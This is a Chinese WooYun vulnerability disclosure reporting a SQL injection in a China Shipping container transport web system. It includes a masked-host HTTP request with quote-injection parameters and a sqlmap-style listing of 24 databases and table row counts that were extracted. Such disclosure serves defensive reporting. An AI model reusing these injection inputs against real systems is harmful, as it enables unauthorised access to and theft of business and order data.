中海集装箱运输系统SQL注射（涉及500W订单详情/涉及大量运输企业产品信息以及订单/涉及24库/上千万信息泄露）

2017年4月21日06:13:45评论347 views字数 274阅读0分54秒阅读模式

摘要

2016-03-01：细节已通知厂商并且等待厂商处理中
2016-03-04：厂商已经确认，细节仅向厂商公开
2016-03-14：细节向核心白帽子及相关领域专家公开
2016-03-24：细节向普通白帽子公开
2016-04-03：细节向实习白帽子公开
2016-04-18：细节向公众公开

漏洞概要关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-179718

漏洞标题：中海集装箱运输系统SQL注射（涉及500W订单详情/涉及大量运输企业产品信息以及订单/涉及24库/上千万信息泄露）

漏洞作者： king7

提交时间： 2016-03-01 09:20

公开时间： 2016-04-18 13:38

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

以后坚持不匿名打卡！滴马萨卡~~##

详细说明：

http://**.**.**.**/e3/exchange/ 存在POST注入，抓跑跑了下，涉及24库，

当前库存贮了大量的订单详情，都是集装箱订单，订单中包括了，物品，时间，地点，价格，可查看大量运输货物信息，粗略看了近500W订单，分表贮存，可能是因为订单的类型不同，

涉及到了大量在使用此集装箱货柜的企业信息，以及详细的物品信息。

信息量过大，截取部分作为证明，

ps:没用kali跑，可能显得有些凌乱。

漏洞证明：

code 区域

GET /e3/exchange/jkcd.jsp?jktdh=AA%27&xhm=AAA%27&Submit=%CC%E1%BD%BB&loginok=YES HTTP/1.1
 Host: **.**.**.**
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Referer: http://**.**.**.**/e3/exchange/
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: JSESSIONID=EE7DB1D7615F87956C441153E1321E9B

code 区域

available databases [24]:
 [*] APEX_030200
 [*] APPQOSSYS
 [*] CTXSYS
 [*] DBSNMP
 [*] E3
 [*] EDS
 [*] EDSEC
 [*] EMS
 [*] EXFSYS
 [*] FLOWS_FILES
 [*] MDSYS
 [*] OLAPSYS
 [*] ORDDATA
 [*] ORDSYS
 [*] OUTLN
 [*] OWBSYS
 [*] SAS
 [*] SCOTT
 [*] SP2200
 [*] SYS
 [*] SYSMAN
 [*] SYSTEM
 [*] WMSYS
 [*] XDB

code 区域

Database: E3
 +------------------------------+---------+
 | Table                        | Entries |
 +------------------------------+---------+
 | CHECKING_CORRECTION          | 1994942 |
 | CORRECTION                   | 1941281 |
 | ORDERS_AUDIT                 | 1277053 |
 | M_CHARGES                    | 1107347 |
 | DRAWING_CTN                  | 952766  |
 | CHECKING_CLP                 | 930086  |
 | EDI_304_ORDERS_BST           | 877319  |
 | LOADING                      | 837616  |
 | DRAWING                      | 723620  |
 | ORDERS_CARGO_DETAIL          | 658586  |
 | ORDERS_EXTEND                | 658403  |
 | ORDERS_USINFO                | 658403  |
 | ORDERS_CARGO                 | 658331  |
 | ORDERS_PARTIES               | 658245  |
 | ORDERS_HEAD                  | 657910  |
 | ORDERS_AMS                   | 657808  |
 | CONTAINERJOB                 | 611763  |
 | CHECKING                     | 483389  |
 | ORDERS_OLD                   | 415896  |
 | ORDERS_ISF                   | 414168  |
 | ORDERS_BST                   | 279033  |
 | MBL_SI_CNTR_DETAIL           | 254323  |
 | CHECKING_CARGO_DETAIL        | 240236  |
 | ORDERS_SERVICE               | 235292  |
 | CTN_DRAWING_EIR              | 222222  |
 | EDI_304_CORRECTION_HISTORY   | 222202  |
 | DRAWING_EIR_PRINTLOG         | 214871  |
 | ORDERS_ACS_BOOKING           | 210827  |
 | CTN_ACC_CHARGES              | 192233  |
 | ORDERS_ACS_MBL               | 181793  |
 | LOGS                         | 150422  |
 | ORDERS_CTN_PRICE             | 127492  |
 | LOADINGLOGS                  | 114862  |
 | M_AR                         | 103047  |
 | ORDERS_FEEDER                | 101603  |
 | LOADING_CORRECTION           | 74170   |
 | MBL_SI_PARTIES               | 69026   |
 | P_WEB_PRVL2ROLE              | 65969   |
 | "RELEASE"                    | 65087   |
 | RELEASE_HIS                  | 33313   |
 | EDI_304_ORDERS_CARGO_DETAIL  | 28869   |
 | ENS_HSCODE                   | 27380   |
 | FLOW_HEAD                    | 26632   |
 | FLOW_DETAIL                  | 26478   |
 | MBL_SI_CNTR                  | 25681   |
 | CTN_ACC_DEBITNOTE            | 24953   |
 | T_O_SCHEDULE_DETAIL          | 24745   |
 | MBL_SI_CARGO                 | 23011   |
 | MBL_SI_HEAD                  | 23011   |
 | HTS                          | 22734   |
 | CORRECTION_SAIL_LOG          | 21099   |
 | T_O_VESSEL_SCHEDULE          | 18241   |
 | DRAWING_EIR_APPLY            | 18027   |
 | LOADING_BAK                  | 17656   |
 | TEMPLATE_AMS                 | 16802   |
 | TEMPLATE_PARTIES             | 16802   |
 | TEMPLATEORDERS               | 16708   |
 | MBL_SI_TOTAL                 | 15647   |
 | M_INVOICE                    | 12622   |
 | DRAWING_LOG                  | 11419   |
 | TEMPLATE_ISF                 | 10867   |
 | EDI_304_CNTR_DETAIL          | 9955    |
 | ORDERS_MERGE_DETAIL          | 8760    |
 | M_AR_APPLY                   | 8516    |
 | DRAWING_EIR                  | 8040    |
 | CORRECTION_SAIL_LIST         | 7358    |
 | CORRECTION_SAIL_HIS          | 6559    |
 | EDI_304_ORDERS               | 5569    |
 | EDI_304_ORDERS_RELATION      | 5247    |
 | T_CODE                       | 5204    |
 | O_VESSEL_SCHEDULE            | 3813    |
 | D_CUSTOMER                   | 3669    |
 | P_WEB_USER2ROLE              | 3039    |
 | ORDERS_UPDATE                | 3029    |
 | ORDERS_MERGE_LOG             | 2807    |
 | ORDERS_MERGE                 | 2586    |
 | P_WEB_ROLE                   | 2483    |
 | USERS                        | 2467    |
 | ILSP_M_INVOICE               | 2450    |
 | EDI_304_LOADING              | 2103    |
 | OLP_ACCOUNT_LOG              | 1976    |
 | OLP_FEE_LIST                 | 1932    |
 | LOADING_CORRECTION_BAK       | 1852    |
 | PORT                         | 1221    |
 | D_VESSEL                     | 1210    |
 | D_SHIP                       | 1209    |
 | D_CUSTOMER_WAYBILL           | 776     |
 | ORDERS_MERGE_HBL             | 753     |
 | CORRECTION_SAIL_CTN          | 749     |
 | MBL_SI_WEB_FLAG              | 589     |
 | DRAWING_USER                 | 547     |
 | SYSCODE                      | 513     |
 | CTN_ACC_INVOICE              | 368     |
 | CORRECTION_SAIL              | 352     |
 | CTN_ACC_OBJECTION            | 199     |
 | D_CHARGE_CODE                | 181     |
 | CTN_EIR_UNBILLED             | 172     |
 | M_CHARGE_TYPE                | 142     |
 | CTN_USERACCOUNT              | 135     |
 | CORRECTION_CUSTOM_LIST       | 115     |
 | CORRECTION_CUSTOM_LOG        | 114     |
 | CTN_USERACCOUNTLOG           | 107     |
 | OLP_ACCOUNT                  | 107     |
 | ESTIMATE_RESULT              | 98      |
 | SY_MENU_BAK                  | 98      |
 | FIELDS                       | 95      |
 | SY_MENU                      | 91      |
 | ORDERS_SPLIT_CARGO           | 82      |
 | ORDERS_GUARANTEE             | 79      |
 | ORDERS_SPLIT_CONTAINER       | 78      |
 | CHECKING_FIELDS              | 76      |
 | P_WEB_PRVL                   | 72      |
 | ILSP_USERS                   | 68      |
 | MS2ORA                       | 68      |
 | REASON                       | 66      |
 | M_INVOICE_TAX                | 65      |
 | CORRECTION_SAIL_TYPE         | 56      |
 | CORRECTION_CUSTOM_HIS        | 55      |
 | CORRECTION_PURPOSE           | 50      |
 | TOAD_PLAN_TABLE              | 50      |
 | D_RELEASE_CARD               | 49      |
 | V_USER_SALES                 | 38      |
 | CORRECTION_CUSTOM_CTN        | 37      |
 | CORRECTION_CUSTOM_TYPE       | 36      |
 | ORDERS_SPLIT                 | 35      |
 | D_MODIFY_BOOKING             | 34      |
 | EO_COUNTRYCODE               | 29      |
 | M_CHARGES_DEL                | 27      |
 | FLOW_MEMBER                  | 26      |
 | CORRECTION_CUSTOM            | 21      |
 | MBL_SI_WEB_QA                | 21      |
 | SCNOBP                       | 19      |
 | LOADING_FIELDS               | 16      |
 | ORDERS_SPLIT_MBLNOS          | 15      |
 | CTN_DYNACONTAINERFEE         | 13      |
 | CONTAINERTYPE                | 12      |
 | EBOOKINGAPPLY                | 12      |
 | D_PORT_OTHER_CODE            | 11      |
 | D_SHIPPERBP                  | 11      |
 | ORDERS_SPLIT_AUDIT           | 10      |
 | DRAWING_APPLY                | 9       |
 | D_COMPANY                    | 7       |
 | D_COMPANY_TEMP               | 7       |
 | TERMS                        | 7       |
 | D_CURRTRAN                   | 6       |
 | E3_RESOURCE                  | 6       |
 | ORDERS_GUARANTEE_RELEASE     | 6       |
 | RBOP_CUSTOMER                | 6       |
 | CONTAINER_DOCK               | 5       |
 | D_ISSUE_SIGN                 | 5       |
 | RBOP_COMPANY                 | 5       |
 | CTN_ACC_XDFCHARGES           | 4       |
 | D_CARRIER                    | 4       |
 | MBL_UNLOADING_NOTE           | 4       |
 | ORDERS_CLARE_LOG             | 4       |
 | CORRECTION_CUSTOM_SPLIT_CTNR | 3       |
 | D_RELEASE                    | 3       |
 | FLOW_DEPT                    | 3       |
 | M_CURR_TYPE                  | 3       |
 | MBL_CERTIFICATE              | 2       |
 | MBL_SI_WEB_COST              | 2       |
 | ORDERS_GUARANTEE_TYPE        | 2       |
 | "VERSION"                    | 1       |
 | AUTOID                       | 1       |
 | CORRECTION_CUSTOM_SPLIT      | 1       |
 | CTN_ACC_XDFDEBITNOTE         | 1       |
 | D_MAIL                       | 1       |
 | MBL_SI_WEB_LINK              | 1       |
 +------------------------------+---------+

修复方案：

版权声明：转载请注明来源 king7@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-03-04 13:38

厂商回复：

CNVD未直接复现所述情况，已由CNVD通过网站管理方公开联系渠道向其邮件通报，由其后续提供解决方案。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-01 10:07 | 方大核桃 ( 普通白帽子 | Rank:193 漏洞数:59 | 要怎么长大,才能赢过时间啊)

2

你关注的白帽子 king7 发表了漏洞中海集装箱运输系统SQL注射（涉及500W订单详情/涉及大量

1# 回复此人
2016-03-01 10:10 | 独臂刀王 ( 普通白帽子 | Rank:393 漏洞数:103 | 提交一个漏洞就可以买个柚子~~好爽~)

1

@方大核桃你现在在济南？

2# 回复此人
2016-03-01 10:15 | 方大核桃 ( 普通白帽子 | Rank:193 漏洞数:59 | 要怎么长大,才能赢过时间啊)

1

@独臂刀王水表在门外......

3# 回复此人

漏洞概要 关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-179718

漏洞标题： 中海集装箱运输系统SQL注射（涉及500W订单详情/涉及大量运输企业产品信息以及订单/涉及24库/上千万信息泄露）

相关厂商： 中海集装箱运输厦门有限公司

漏洞作者： king7

提交时间： 2016-03-01 09:20

公开时间： 2016-04-18 13:38

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 king7@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(12) 关注此漏洞

漏洞标题：中海集装箱运输系统SQL注射（涉及500W订单详情/涉及大量运输企业产品信息以及订单/涉及24库/上千万信息泄露）

相关厂商：中海集装箱运输厦门有限公司

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分